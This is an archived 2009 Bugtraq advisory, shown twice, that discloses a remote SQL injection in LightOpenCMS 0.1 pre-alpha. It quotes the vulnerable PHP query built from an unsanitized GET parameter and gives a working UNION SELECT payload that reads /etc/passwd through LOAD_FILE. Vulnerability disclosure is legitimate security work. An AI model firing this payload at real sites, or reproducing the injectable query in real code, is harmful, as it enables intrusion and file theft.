LightOpenCMS 0.1 pre-alpha Remote SQL Injection

From: Salvatore "drosophila" Fresta <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>,str0ke <milw0rm@gmail.com>
Cc:
Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Date:

Attachments:
LightOpenCMS 0.1 pre-alpha Remote SQL Injection-05062009.txt

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statments.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************

-- 
Salvatore Fresta aka drosophila
CWNP444351

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statments.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************



Copyright © 1995-2018 LinuxRocket.net. All rights reserved.